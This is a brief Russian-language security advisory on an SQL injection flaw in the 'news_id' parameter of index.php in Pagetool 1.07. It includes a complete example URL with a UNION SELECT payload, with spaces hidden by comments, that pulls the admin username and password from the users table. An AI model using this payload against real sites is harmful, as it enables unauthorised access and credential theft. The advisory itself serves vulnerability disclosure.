Программа: Pagetool 1.07

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «news_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://www.site.com/[path]/index.php?name=pagetool_news&news_id= -1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/* */username),/**/CONCAT(0x50617373773072643A20,/**/passwd), /**/null/**/from/**/pt_core_users/**/where/**/user_id=1



Оставить мнение